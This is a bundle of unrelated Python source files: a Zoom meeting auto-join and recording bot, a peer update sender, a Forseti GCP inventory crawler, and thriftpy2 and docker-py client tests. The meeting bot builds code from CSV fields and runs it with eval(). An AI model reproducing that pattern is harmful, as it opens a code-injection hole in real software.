# minimize panel
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'minimize.png'), confidence=0.9)
pyautogui.click(x, y)
except TypeError:
logging.error("Could not minimize panel!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_minimize_error.png")
# Move mouse from screen
pyautogui.moveTo(0, 0)
pyautogui.click(0, 0)
if DEBUG and ffmpeg_debug is not None:
os.killpg(os.getpgid(ffmpeg_debug.pid), signal.SIGQUIT)
atexit.unregister(os.killpg)
# Audio
# Start recording
logging.info("Start recording..")
filename = os.path.join(REC_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + ".mkv"
width, height = pyautogui.size()
resolution = str(width) + 'x' + str(height)
disp = os.getenv('DISPLAY')
command = "ffmpeg -nostats -loglevel error -f pulse -ac 2 -i 1 -f x11grab -r 30 -s " + resolution + " -i " + \
disp + " -acodec pcm_s16le -vcodec libx264rgb -preset ultrafast -crf 0 -threads 0 -async 1 -vsync 1 " + filename
ffmpeg = subprocess.Popen(
command, stdout=subprocess.PIPE, shell=True, preexec_fn=os.setsid)
atexit.register(os.killpg, os.getpgid(
ffmpeg.pid), signal.SIGQUIT)
start_date = datetime.now()
end_date = start_date + timedelta(seconds=duration + 300) # Add 5 minutes
# Start thread to check active screensharing
HideViewOptionsThread(description)
# Send Telegram Notification
send_telegram_message("Joined Meeting '{}' and started recording.".format(description))
meeting_running = True
while meeting_running:
time_remaining = end_date - datetime.now()
if time_remaining.total_seconds() < 0 or not ONGOING_MEETING:
meeting_running = False
else:
print(f"Meeting ends in {time_remaining}", end="\r", flush=True)
time.sleep(5)
logging.info("Meeting ends at %s" % datetime.now())
# Close everything
if DEBUG and ffmpeg_debug is not None:
os.killpg(os.getpgid(ffmpeg_debug.pid), signal.SIGQUIT)
atexit.unregister(os.killpg)
os.killpg(os.getpgid(zoom.pid), signal.SIGQUIT)
os.killpg(os.getpgid(ffmpeg.pid), signal.SIGQUIT)
atexit.unregister(os.killpg)
if not ONGOING_MEETING:
try:
# Press OK after meeting ended by host
x, y = pyautogui.locateCenterOnScreen(
os.path.join(IMG_PATH, 'ok.png'), confidence=0.9)
pyautogui.click(x, y)
except TypeError:
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_ok_error.png")
send_telegram_message("Meeting '{}' ended.".format(description))
def play_audio(description):
# Get all files in audio directory
files=os.listdir(AUDIO_PATH)
# Filter .wav files
files=list(filter(lambda f: f.endswith(".wav"), files))
# Check if .wav files available
if len(files) > 0:
unmute(description)
# Get random file
file=random.choice(files)
path = os.path.join(AUDIO_PATH, file)
# Use paplay to play .wav file on specific Output
command = "/usr/bin/paplay --device=microphone -p " + path
play = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
res, err = play.communicate()
if play.returncode != 0:
logging.error("Failed playing file! - " + str(play.returncode) + " - " + str(err))
else:
logging.debug("Successfully played audio file! - " + str(play.returncode))
mute(description)
else:
logging.error("No .wav files found!")
def exit_process_by_name(name):
list_of_process_ids = find_process_id_by_name(name)
if len(list_of_process_ids) > 0:
logging.info(name + " process exists | killing..")
for elem in list_of_process_ids:
process_id = elem['pid']
try:
os.kill(process_id, signal.SIGKILL)
except Exception as ex:
logging.error("Could not terminate " + name +
"[" + str(process_id) + "]: " + str(ex))
def join_ongoing_meeting():
with open(CSV_PATH, mode='r') as csv_file:
csv_reader = csv.DictReader(csv_file, delimiter=CSV_DELIMITER)
for row in csv_reader:
# Check and join ongoing meeting
curr_date = datetime.now()
# Monday, tuesday, ..
if row["weekday"].lower() == curr_date.strftime('%A').lower():
curr_time = curr_date.time()
start_time_csv = datetime.strptime(row["time"], '%H:%M')
start_date = curr_date.replace(
hour=start_time_csv.hour, minute=start_time_csv.minute)
start_time = start_date.time()
end_date = start_date + \
timedelta(seconds=int(row["duration"]) * 60 + 300) # Add 5 minutes
end_time = end_date.time()
recent_duration = (end_date - curr_date).total_seconds()
if start_time < end_time:
if start_time <= curr_time <= end_time and str(row["record"]) == 'true':
logging.info(
"Join meeting that is currently running..")
join(meet_id=row["id"], meet_pw=row["password"],
duration=recent_duration, description=row["description"])
else: # crosses midnight
if (curr_time >= start_time or curr_time <= end_time) and str(row["record"]) == 'true':
logging.info(
"Join meeting that is currently running..")
join(meet_id=row["id"], meet_pw=row["password"],
duration=recent_duration, description=row["description"])
def setup_schedule():
with open(CSV_PATH, mode='r') as csv_file:
csv_reader = csv.DictReader(csv_file, delimiter=CSV_DELIMITER)
line_count = 0
for row in csv_reader:
if str(row["record"]) == 'true':
cmd_string = "schedule.every()." + row["weekday"] \
+ ".at(\"" \
+ (datetime.strptime(row["time"], '%H:%M') - timedelta(minutes=1)).strftime('%H:%M') \
+ "\").do(join, meet_id=\"" + row["id"] \
+ "\", meet_pw=\"" + row["password"] \
+ "\", duration=" + str(int(row["duration"]) * 60) \
+ ", description=\"" + row["description"] + "\")"
cmd = compile(cmd_string, "<string>", "eval")
eval(cmd)
line_count += 1
logging.info("Added %s meetings to schedule." % line_count)
def main():
try:
if DEBUG and not os.path.exists(DEBUG_PATH):
os.makedirs(DEBUG_PATH)
except Exception:
logging.error("Failed to create screenshot folder!")
raise
setup_schedule()
join_ongoing_meeting()
if __name__ == '__main__':
main()
while True:
schedule.run_pending()
time.sleep(1)
time_of_next_run = schedule.next_run()
time_now = datetime.now()
remaining = time_of_next_run - time_now
print(f"Next meeting in {remaining}", end="\r", flush=True)
|
sender.py
|
from threading import RLock, Event, Condition, Thread
import time
import requests
import json
from src.util import EmptyQueueError, DevicePushbackError
from src.updatequeue import UpdateQueue
class Sender(object):
def __init__(self, k):
# :brief Create a new Sender instance.
self.lock = RLock()
self.my_host = None
self.other_hosts = None
self.other_leaders = None
self.wait_times = {}
self.last_sent_times = {}
self.num_devices = -1
self.host_locks = {}
# Includes both the queues for other_hosts and other_leaders
self.queues = {}
self.total_no_of_updates = 0
self.min_queue_len = None
self.k = k
self.condition = Condition()
def setup(self, my_host, other_hosts, other_leaders):
# :brief Set up a queue for each host.
# :param my_host [str] an id for this server
# :param other_hosts [array<str>] the ids of the other hosts in this cluster
# :param other_leaders [array<str>] the ids of the leaders of the other clusters
self.my_host = my_host
self.other_hosts = other_hosts
self.other_leaders = other_leaders
self.num_devices = 1 + len(other_hosts) + len(other_leaders)
self.write()
self.wait_times[my_host] = .1
self.last_sent_times[my_host] = 0
self.host_locks[my_host] = RLock()
for host in other_hosts + other_leaders:
self.queues[host] = UpdateQueue()
self.wait_times[host] = .1
self.last_sent_times[host] = 0
self.host_locks[host] = RLock()
self.release()
def dequeue_every_queue(self):
# :brief Clear every host's queue
# :return nothing
self.write()
for queue in self.queues:
self.total_no_of_updates -= len(self.queues[queue])
self.queues[queue].clear()
self.release()
return
def enqueue(self, update, other_leaders = False):
# :brief Add an update to the queues of the hosts in the same cluster when
# other_leaders is False, or to the queues of the other leaders when it is True.
# :param update [Object] a model update that needs to be processed
# :param host [str] the id for the host that generated the update
queues = self.other_leaders if other_leaders else self.other_hosts
for host in queues:
# print("SEND TO", host)
self.write_host(host)
queue = self.queues[host]
if self.min_queue_len is not None:
if queue.len > self.k * self.min_queue_len:
self.release_host(host)
raise DevicePushbackError("could not enqueue new update")
queue.enqueue(update)
self.total_no_of_updates += 1
self._update_min_and_max()
self.release_host(host)
# Enqueuing notifies the sender thread
with self.condition:
self.condition.notify()
# print("ML THREAD WOKE UP SENDER THREAD")
def run(self):
# :brief Spawn a new thread and begin sending update requests to other devices
t = Thread(target=self._actually_run)
t.start()
def _actually_run(self):
# :brief Send updates to peers when possible.
while True:
if self.total_no_of_updates > 0:
for host in self.queues:
self._update_host(host)
else:
with self.condition:
# print("SENDER THREAD SLEEPING")
self.condition.wait()
# print("SENDER THREAD WOKE UP FROM ML THREAD")
# TODO (GS): To update min_queue_len after each enqueue and dequeue
def _update_min_and_max(self):
pass
def _update_host(self, host):
# :brief Try to update peer if possible.
# If the update succeeds, then the update will be
# popped from that hosts queue.
if time.time() < self.last_sent_times[host] + self.wait_times[host]:
return
self.read_host(host)
queue = self.queues[host]
update = None
try:
update = queue.dequeue()
self.total_no_of_updates -= 1
except EmptyQueueError:
self.release_host(host)
return
if 'CLEAR' in update:
res = requests.post("http://" + host + "/clear_all_queues", json={"sender": self.my_host, "epoch": update['epoch']})
elif 'CLOSE' in update:
res = requests.post("http://" + host + "/close", json={"sender": self.my_host})
else:
res = requests.post("http://" + host + "/send_update", json={"sender": self.my_host, "update": update})
if res.status_code >= 400 and res.status_code < 500:
self.wait_times[host] *= 2
self.release_host(host)
return
self.last_sent_times[host] = time.time()
self.wait_times[host] = max(0.1, self.wait_times[host] - .1)
self._update_min_and_max()
self.release_host(host)
# Call `read` before reading, and `release` after reading.
# Call `write` before writing, and `release` after writing.
def read_host(self, host):
# :brief Read lock a host queue
# print("READ HOST FOR HOST:", host)
self.host_locks[host].acquire(blocking=0)
def write_host(self, host):
# :brief Write lock a host queue.
self.host_locks[host].acquire(blocking=1)
def release_host(self, host):
# :brief Release a lock on the host queue.
# print("RELEASE HOST FOR HOST", host)
self.host_locks[host].release()
def read(self):
# :brief Read lock on self.
self.lock.acquire(blocking=0)
def write(self):
# :brief Write lock on self.
self.lock.acquire(blocking=1)
def release(self):
# :brief Release lock on self.
self.lock.release()
def __str__(self):
# :brief Print out elements in all queues, for debugging purposes.
# :return [str] the Sender queues as a string
self.read()
re = "\nSender:\n"
for qid in self.queues:
re = re + qid + ":" + str(self.queues[qid].queue) + "\n"
self.release()
return re
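# Hedged usage sketch (not part of the original module); the host strings are hypothetical
# placeholders:
#
#     sender = Sender(k=2)
#     sender.setup("10.0.0.1:5000", ["10.0.0.2:5000"], ["10.0.1.1:5000"])
#     sender.run()                                        # spawn the background sender thread
#     sender.enqueue({"epoch": 1})                        # queue an update for same-cluster hosts
#     sender.enqueue({"epoch": 1}, other_leaders=True)    # ... or for the other leaders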
|
crawler.py
|
# Copyright 2017 The Forseti Security Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Crawler implementation."""
from builtins import str
from builtins import range
from queue import Empty
from queue import Queue
import threading
import time
from future import standard_library
from google.cloud.forseti.common.util import logger
from google.cloud.forseti.services.inventory.base import cai_gcp_client
from google.cloud.forseti.services.inventory.base import cloudasset
from google.cloud.forseti.services.inventory.base import crawler
from google.cloud.forseti.services.inventory.base import gcp
from google.cloud.forseti.services.inventory.base import resources
standard_library.install_aliases()
LOGGER = logger.get_logger(__name__)
class CrawlerConfig(crawler.CrawlerConfig):
"""Crawler configuration to inject dependencies."""
def __init__(self, storage, progresser, api_client, variables=None):
"""Initialize
Args:
storage (Storage): The inventory storage
progresser (QueueProgresser): The progresser implemented using
a queue
api_client (ApiClientImpl): GCP API client
variables (dict): config variables
"""
super(CrawlerConfig, self).__init__()
self.storage = storage
self.progresser = progresser
self.variables = {} if not variables else variables
self.client = api_client
class ParallelCrawlerConfig(crawler.CrawlerConfig):
"""Multithreaded crawler configuration, to inject dependencies."""
def __init__(self, storage, progresser, api_client, threads=10,
variables=None):
"""Initialize
Args:
storage (Storage): The inventory storage
progresser (QueueProgresser): The progresser implemented using
a queue
api_client (ApiClientImpl): GCP API client
threads (int): how many threads to use
variables (dict): config variables
"""
super(ParallelCrawlerConfig, self).__init__()
self.storage = storage
self.progresser = progresser
self.variables = {} if not variables else variables
self.threads = threads
self.client = api_client
class Crawler(crawler.Crawler):
"""Simple single-threaded Crawler implementation."""
def __init__(self, config):
"""Initialize
Args:
config (CrawlerConfig): The crawler configuration
"""
super(Crawler, self).__init__()
self.config = config
def run(self, resource):
"""Run the crawler, given a start resource.
Args:
resource (object): Resource to start with.
Returns:
QueueProgresser: The filled progresser described in inventory
"""
resource.accept(self)
return self.config.progresser
def visit(self, resource):
"""Handle a newly found resource.
Args:
resource (object): Resource to handle.
Raises:
Exception: Reraises any exception.
"""
progresser = self.config.progresser
try:
resource.get_iam_policy(self.get_client())
resource.get_gcs_policy(self.get_client())
resource.get_dataset_policy(self.get_client())
resource.get_cloudsql_policy(self.get_client())
resource.get_billing_info(self.get_client())
resource.get_enabled_apis(self.get_client())
resource.get_kubernetes_service_config(self.get_client())
self.write(resource)
except Exception as e:
LOGGER.exception(e)
progresser.on_error(e)
raise
else:
progresser.on_new_object(resource)
def dispatch(self, callback):
"""Dispatch crawling of a subtree.
Args:
callback (function): Callback to dispatch.
"""
callback()
def write(self, resource):
"""Save resource to storage.
Args:
resource (object): Resource to handle.
"""
self.config.storage.write(resource)
def get_client(self):
"""Get the GCP API client.
Returns:
object: GCP API client
"""
return self.config.client
def on_child_error(self, error):
"""Process the error generated by child of a resource
Inventory does not stop for children errors but raise a warning
Args:
error (str): error message to handle
"""
warning_message = '{}\n'.format(error)
self.config.storage.warning(warning_message)
self.config.progresser.on_warning(error)
def update(self, resource):
"""Update the row of an existing resource
Args:
resource (Resource): Resource to update.
Raises:
Exception: Reraises any exception.
"""
try:
self.config.storage.update(resource)
except Exception as e:
LOGGER.exception(e)
self.config.progresser.on_error(e)
raise
class ParallelCrawler(Crawler):
"""Multi-threaded Crawler implementation."""
def __init__(self, config):
"""Initialize
Args:
config (ParallelCrawlerConfig): The crawler configuration
"""
super(ParallelCrawler, self).__init__(config)
self._write_lock = threading.Lock()
self._dispatch_queue = Queue()
self._shutdown_event = threading.Event()
def _start_workers(self):
"""Start a pool of worker threads for processing the dispatch queue."""
self._shutdown_event.clear()
for _ in range(self.config.threads):
worker = threading.Thread(target=self._process_queue)
worker.daemon = True
worker.start()
def _process_queue(self):
"""Process items in the queue until the shutdown event is set."""
while not self._shutdown_event.is_set():
try:
callback = self._dispatch_queue.get(timeout=1)
except Empty:
continue
callback()
self._dispatch_queue.task_done()
def run(self, resource):
"""Run the crawler, given a start resource.
Args:
resource (Resource): Resource to start with.
Returns:
QueueProgresser: The filled progresser described in inventory
"""
try:
self._start_workers()
resource.accept(self)
self._dispatch_queue.join()
finally:
self._shutdown_event.set()
# Wait for threads to exit.
time.sleep(2)
return self.config.progresser
def dispatch(self, callback):
"""Dispatch crawling of a subtree.
Args:
callback (function): Callback to dispatch.
"""
self._dispatch_queue.put(callback)
def write(self, resource):
"""Save resource to storage.
Args:
resource (Resource): Resource to handle.
"""
with self._write_lock:
self.config.storage.write(resource)
def on_child_error(self, error):
"""Process the error generated by child of a resource
Inventory does not stop for children errors but raise a warning
Args:
error (str): error message to handle
"""
warning_message = '{}\n'.format(error)
with self._write_lock:
self.config.storage.warning(warning_message)
self.config.progresser.on_warning(error)
def update(self, resource):
"""Update the row of an existing resource
Args:
resource (Resource): The db row of Resource to update
Raises:
Exception: Reraises any exception.
"""
try:
with self._write_lock:
self.config.storage.update(resource)
except Exception as e:
LOGGER.exception(e)
self.config.progresser.on_error(e)
raise
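# Added illustration (not part of the original module): ParallelCrawler above
# combines a Queue of callbacks, a pool of daemon worker threads and a
# threading.Event shutdown flag. A minimal standalone sketch of that pattern
# follows; run_worker_pool and its arguments are illustrative names, not
# Forseti API.
def run_worker_pool(callbacks, worker_count=10):
    """Execute the given callbacks on a pool of daemon threads."""
    try:
        from queue import Queue, Empty  # Python 3
    except ImportError:
        from Queue import Queue, Empty  # Python 2
    import threading
    work_queue = Queue()
    shutdown = threading.Event()
    def worker():
        # Poll with a timeout so the thread can notice the shutdown flag.
        while not shutdown.is_set():
            try:
                callback = work_queue.get(timeout=1)
            except Empty:
                continue
            try:
                callback()
            finally:
                work_queue.task_done()  # always mark the item, even on error
    for _ in range(worker_count):
        thread = threading.Thread(target=worker)
        thread.daemon = True
        thread.start()
    for callback in callbacks:
        work_queue.put(callback)
    work_queue.join()  # returns once every queued callback has been processed
    shutdown.set()     # lets the idle workers fall out of their polling loop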
def _api_client_factory(storage, config, parallel):
"""Creates the proper initialized API client based on the configuration.
Args:
storage (object): Storage implementation to use.
config (object): Inventory configuration on server.
parallel (bool): If true, use the parallel crawler implementation.
Returns:
Union[gcp.ApiClientImpl, cai_gcp_client.CaiApiClientImpl]:
The initialized api client implementation class.
"""
client_config = config.get_api_quota_configs()
client_config['domain_super_admin_email'] = config.get_gsuite_admin_email()
client_config['excluded_resources'] = config.get_excluded_resources()
asset_count = 0
if config.get_cai_enabled():
# TODO: When CAI supports resource exclusion, update the following
# method to handle resource exclusion during export time.
asset_count = cloudasset.load_cloudasset_data(storage.session, config)
LOGGER.info('%s total assets loaded from Cloud Asset data.',
asset_count)
if asset_count:
engine = config.get_service_config().get_engine()
return cai_gcp_client.CaiApiClientImpl(client_config,
engine,
parallel,
storage.session)
# Default to the non-CAI implementation
return gcp.ApiClientImpl(client_config)
def _crawler_factory(storage, progresser, client, parallel):
"""Creates the proper initialized crawler based on the configuration.
Args:
storage (object): Storage implementation to use.
progresser (object): Progresser to notify status updates.
client (object): The API client instance.
parallel (bool): If true, use the parallel crawler implementation.
Returns:
Union[Crawler, ParallelCrawler]:
The initialized crawler implementation class.
"""
excluded_resources = set(client.config.get('excluded_resources', []))
config_variables = {'excluded_resources': excluded_resources}
if parallel:
parallel_config = ParallelCrawlerConfig(storage,
progresser,
client,
variables=config_variables)
return ParallelCrawler(parallel_config)
# Default to the non-parallel crawler
crawler_config = CrawlerConfig(storage,
progresser,
client,
variables=config_variables)
return Crawler(crawler_config)
def _root_resource_factory(config, client):
"""Creates the proper initialized crawler based on the configuration.
Args:
config (object): Inventory configuration on server.
client (object): The API client instance.
Returns:
Resource: The initialized root resource.
"""
if config.use_composite_root():
composite_root_resources = config.get_composite_root_resources()
return resources.CompositeRootResource.create(composite_root_resources)
# Default is a single resource as root.
return resources.from_root_id(client, config.get_root_resource_id())
def run_crawler(storage,
progresser,
config,
parallel=True):
"""Run the crawler with a determined configuration.
Args:
storage (object): Storage implementation to use.
progresser (object): Progresser to notify status updates.
config (object): Inventory configuration on server.
parallel (bool): If true, use the parallel crawler implementation.
Returns:
QueueProgresser: The progresser implemented in inventory
"""
if parallel and 'sqlite' in str(config.get_service_config().get_engine()):
LOGGER.info('SQLite used, disabling parallel threads.')
parallel = False
client = _api_client_factory(storage, config, parallel)
crawler_impl = _crawler_factory(storage, progresser, client, parallel)
resource = _root_resource_factory(config, client)
progresser = crawler_impl.run(resource)
# flush the buffer at the end to make sure nothing is cached.
storage.commit()
return progresser
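# Added illustration (not part of the original module): run_crawler and the
# factories above share one shape -- inspect the configuration, then return
# either the serial or the parallel implementation, falling back to serial when
# the storage engine is SQLite. A self-contained sketch of that selection logic;
# SerialRunner, ParallelRunner and runner_factory are illustrative names only,
# and threading is already imported at the top of this module.
class SerialRunner(object):
    """Run jobs one after another in the calling thread."""
    def run(self, jobs):
        for job in jobs:
            job()
class ParallelRunner(object):
    """Run each job on its own thread and wait for all of them."""
    def run(self, jobs):
        workers = [threading.Thread(target=job) for job in jobs]
        for worker in workers:
            worker.start()
        for worker in workers:
            worker.join()
def runner_factory(engine_url, parallel=True):
    """Return the parallel runner unless the backend cannot handle threads."""
    if parallel and 'sqlite' in engine_url:
        parallel = False  # mirrors the SQLite check in run_crawler above
    return ParallelRunner() if parallel else SerialRunner()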
|
test_rpc.py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import os
import multiprocessing
import socket
import time
import ssl
import pytest
import thriftpy2
thriftpy2.install_import_hook()
from thriftpy2._compat import PY3 # noqa
from thriftpy2.rpc import make_server, client_context # noqa
from thriftpy2.transport import TTransportException # noqa
addressbook = thriftpy2.load(os.path.join(os.path.dirname(__file__),
"addressbook.thrift"))
unix_sock = "/tmp/thriftpy_test.sock"
SSL_PORT = 50441
class Dispatcher(object):
def __init__(self):
self.ab = addressbook.AddressBook()
self.ab.people = {}
def ping(self):
return True
def hello(self, name):
return "hello " + name
def add(self, person):
self.ab.people[person.name] = person
return True
def remove(self, name):
try:
self.ab.people.pop(name)
return True
except KeyError:
raise addressbook.PersonNotExistsError(
"{} not exists".format(name))
def get(self, name):
try:
return self.ab.people[name]
except KeyError:
raise addressbook.PersonNotExistsError(
"{} not exists".format(name))
def book(self):
return self.ab
def get_phonenumbers(self, name, count):
p = [self.ab.people[name].phones[0]] if name in self.ab.people else []
return p * count
def get_phones(self, name):
phone_numbers = self.ab.people[name].phones
return dict((p.type, p.number) for p in phone_numbers)
def sleep(self, ms):
time.sleep(ms / 1000.0)
return True
def close(self, ms):
return
@pytest.fixture(scope="module")
def server(request):
server = make_server(addressbook.AddressBookService, Dispatcher(),
unix_socket=unix_sock)
ps = multiprocessing.Process(target=server.serve)
ps.start()
time.sleep(0.1)
def fin():
if ps.is_alive():
ps.terminate()
try:
os.remove(unix_sock)
except IOError:
pass
request.addfinalizer(fin)
@pytest.fixture(scope="module")
def ssl_server(request):
ssl_server = make_server(addressbook.AddressBookService, Dispatcher(),
host='localhost', port=SSL_PORT,
certfile="ssl/server.pem")
ps = multiprocessing.Process(target=ssl_server.serve)
ps.start()
time.sleep(0.1)
def fin():
if ps.is_alive():
ps.terminate()
request.addfinalizer(fin)
@pytest.fixture(scope="module")
def person():
phone1 = addressbook.PhoneNumber()
phone1.type = addressbook.PhoneType.MOBILE
phone1.number = '555-1212'
phone2 = addressbook.PhoneNumber()
phone2.type = addressbook.PhoneType.HOME
phone2.number = '555-1234'
# empty struct
phone3 = addressbook.PhoneNumber()
alice = addressbook.Person()
alice.name = "Alice"
alice.phones = [phone1, phone2, phone3]
alice.created_at = int(time.time())
return alice
def client(timeout=3000):
return client_context(addressbook.AddressBookService,
unix_socket=unix_sock, timeout=timeout)
def ssl_client(timeout=3000):
return client_context(addressbook.AddressBookService,
host='localhost', port=SSL_PORT,
timeout=timeout,
cafile="ssl/CA.pem", certfile="ssl/client.crt",
keyfile="ssl/client.key")
def test_void_api(server):
with client() as c:
assert c.ping() is None
def test_void_api_with_ssl(ssl_server):
with ssl_client() as c:
assert c.ping() is None
def test_string_api(server):
with client() as c:
assert c.hello("world") == "hello world"
def test_string_api_with_ssl(ssl_server):
with ssl_client() as c:
assert c.hello("world") == "hello world"
def test_huge_res(server):
with client() as c:
big_str = "world" * 100000
assert c.hello(big_str) == "hello " + big_str
def test_huge_res_with_ssl(ssl_server):
with ssl_client() as c:
big_str = "world" * 100000
assert c.hello(big_str) == "hello " + big_str
def test_tstruct_req(person):
with client() as c:
assert c.add(person) is True
def test_tstruct_req_with_ssl(person):
with ssl_client() as c:
assert c.add(person) is True
def test_tstruct_res(person):
with client() as c:
assert person == c.get("Alice")
def test_tstruct_res_with_ssl(person):
with ssl_client() as c:
assert person == c.get("Alice")
def test_complex_tstruct():
with client() as c:
assert len(c.get_phonenumbers("Alice", 0)) == 0
assert len(c.get_phonenumbers("Alice", 1000)) == 1000
def test_complex_tstruct_with_ssl():
with ssl_client() as c:
assert len(c.get_phonenumbers("Alice", 0)) == 0
assert len(c.get_phonenumbers("Alice", 1000)) == 1000
def test_exception():
with pytest.raises(addressbook.PersonNotExistsError):
with client() as c:
c.remove("Bob")
def test_exception_with_ssl():
with pytest.raises(addressbook.PersonNotExistsError):
with ssl_client() as c:
c.remove("Bob")
def test_client_timeout():
with pytest.raises(socket.timeout):
with client(timeout=500) as c:
c.sleep(1000)
def test_client_socket_timeout():
with pytest.raises(socket.timeout):
with client_context(addressbook.AddressBookService,
unix_socket=unix_sock,
socket_timeout=500) as c:
c.sleep(1000)
def test_client_connect_timeout():
with pytest.raises(TTransportException):
with client_context(addressbook.AddressBookService,
unix_socket='/tmp/test.sock',
connect_timeout=1000) as c:
c.hello('test')
def test_ssl_client_timeout():
# SSL socket timeout raises socket.timeout since Python 3.2.
# http://bugs.python.org/issue10272
with pytest.raises(socket.timeout if PY3 else ssl.SSLError):
with ssl_client(timeout=500) as c:
c.sleep(1000)
def test_close_method():
with client() as c:
c.tclose(1)
|
test.py
|
# Copyright 2013 dotCloud inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import datetime
import gzip
import io
import json
import os
import re
import shutil
import signal
import socket
import sys
import tarfile
import tempfile
import threading
import time
import unittest
import warnings
import random
import docker
import requests
import six
import base
import fake_api
try:
from unittest import mock
except ImportError:
import mock
DEFAULT_TIMEOUT_SECONDS = docker.client.constants.DEFAULT_TIMEOUT_SECONDS
warnings.simplefilter('error')
warnings.filterwarnings('error')
create_host_config = docker.utils.create_host_config
def response(status_code=200, content='', headers=None, reason=None, elapsed=0,
request=None):
res = requests.Response()
res.status_code = status_code
if not isinstance(content, six.binary_type):
content = json.dumps(content).encode('ascii')
res._content = content
res.headers = requests.structures.CaseInsensitiveDict(headers or {})
res.reason = reason
res.elapsed = datetime.timedelta(elapsed)
res.request = request
return res
def fake_resolve_authconfig(authconfig, registry=None):
return None
def fake_resp(url, data=None, **kwargs):
status_code, content = fake_api.fake_responses[url]()
return response(status_code=status_code, content=content)
fake_request = mock.Mock(side_effect=fake_resp)
url_prefix = 'http+docker://localunixsocket/v{0}/'.format(
docker.client.constants.DEFAULT_DOCKER_API_VERSION)
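# Added illustration (not part of the original tests): the tests below all
# follow the same recipe -- swap the HTTP layer for a mock.Mock whose side_effect
# builds a canned response, exercise the client, then assert on the recorded
# call. A minimal standalone version of that recipe; fetch_status,
# _example_mocked_request and the URL are illustrative assumptions, not
# docker-py API.
def fetch_status(session, url):
    """Tiny stand-in for client code that issues a GET and decodes JSON."""
    return session.get(url).json()
def _example_mocked_request():
    session = mock.Mock()
    session.get.side_effect = lambda url: mock.Mock(json=lambda: {'ok': True})
    assert fetch_status(session, 'http+docker://localunixsocket/_ping') == {'ok': True}
    session.get.assert_called_with('http+docker://localunixsocket/_ping')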
class Cleanup(object):
if sys.version_info < (2, 7):
# Provide a basic implementation of addCleanup for Python < 2.7
def __init__(self, *args, **kwargs):
super(Cleanup, self).__init__(*args, **kwargs)
self._cleanups = []
def tearDown(self):
super(Cleanup, self).tearDown()
ok = True
while self._cleanups:
fn, args, kwargs = self._cleanups.pop(-1)
try:
fn(*args, **kwargs)
except KeyboardInterrupt:
raise
except:
ok = False
if not ok:
raise
def addCleanup(self, function, *args, **kwargs):
self._cleanups.append((function, args, kwargs))
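# Added illustration (not part of the original tests): the Cleanup mix-in above
# backports addCleanup for Python < 2.7 by stacking callbacks during the test
# and popping them in reverse order from tearDown. A tiny usage sketch; the
# _TempDirExample name is an illustrative assumption, and os, shutil, tempfile
# and unittest are already imported at the top of this file.
class _TempDirExample(Cleanup, unittest.TestCase):
    """Illustrative only: the registered cleanup runs after the test."""
    def test_creates_and_removes_tmpdir(self):
        tmpdir = tempfile.mkdtemp()
        self.addCleanup(shutil.rmtree, tmpdir)  # removed during tearDown
        self.assertTrue(os.path.isdir(tmpdir))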
@mock.patch.multiple('docker.Client', get=fake_request, post=fake_request,
put=fake_request, delete=fake_request)
class DockerClientTest(Cleanup, base.BaseTestCase):
def setUp(self):
self.client = docker.Client()
# Force-clear authconfig to avoid tampering with the tests
self.client._cfg = {'Configs': {}}
def tearDown(self):
self.client.close()
def assertIn(self, object, collection):
if six.PY2 and sys.version_info[1] <= 6:
return self.assertTrue(object in collection)
return super(DockerClientTest, self).assertIn(object, collection)
def base_create_payload(self, img='busybox', cmd=None):
if not cmd:
cmd = ['true']
return {"Tty": False, "Image": img, "Cmd": cmd,
"AttachStdin": False, "Memory": 0,
"AttachStderr": True, "AttachStdout": True,
"StdinOnce": False,
"OpenStdin": False, "NetworkDisabled": False,
"MemorySwap": 0
}
def test_ctor(self):
try:
docker.Client(version=1.12)
except Exception as e:
self.assertTrue(isinstance(e, docker.errors.DockerException))
if not six.PY3:
self.assertEqual(
str(e),
'Version parameter must be a string or None. Found float'
)
#########################
# INFORMATION TESTS #
#########################
def test_version(self):
try:
self.client.version()
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'version',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_retrieve_server_version(self):
client = docker.Client(version="auto")
self.assertTrue(isinstance(client._version, six.string_types))
self.assertFalse(client._version == "auto")
client.close()
def test_auto_retrieve_server_version(self):
try:
version = self.client._retrieve_server_version()
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
else:
self.assertTrue(isinstance(version, six.string_types))
def test_info(self):
try:
self.client.info()
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'info',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_search(self):
try:
self.client.search('busybox')
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'images/search',
params={'term': 'busybox'},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_image_viz(self):
try:
self.client.images('busybox', viz=True)
self.fail('Viz output should not be supported!')
except Exception:
pass
def test_events(self):
try:
self.client.events()
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'events',
params={'since': None, 'until': None, 'filters': None},
stream=True
)
def test_events_with_since_until(self):
ts = 1356048000
now = datetime.datetime.fromtimestamp(ts)
since = now - datetime.timedelta(seconds=10)
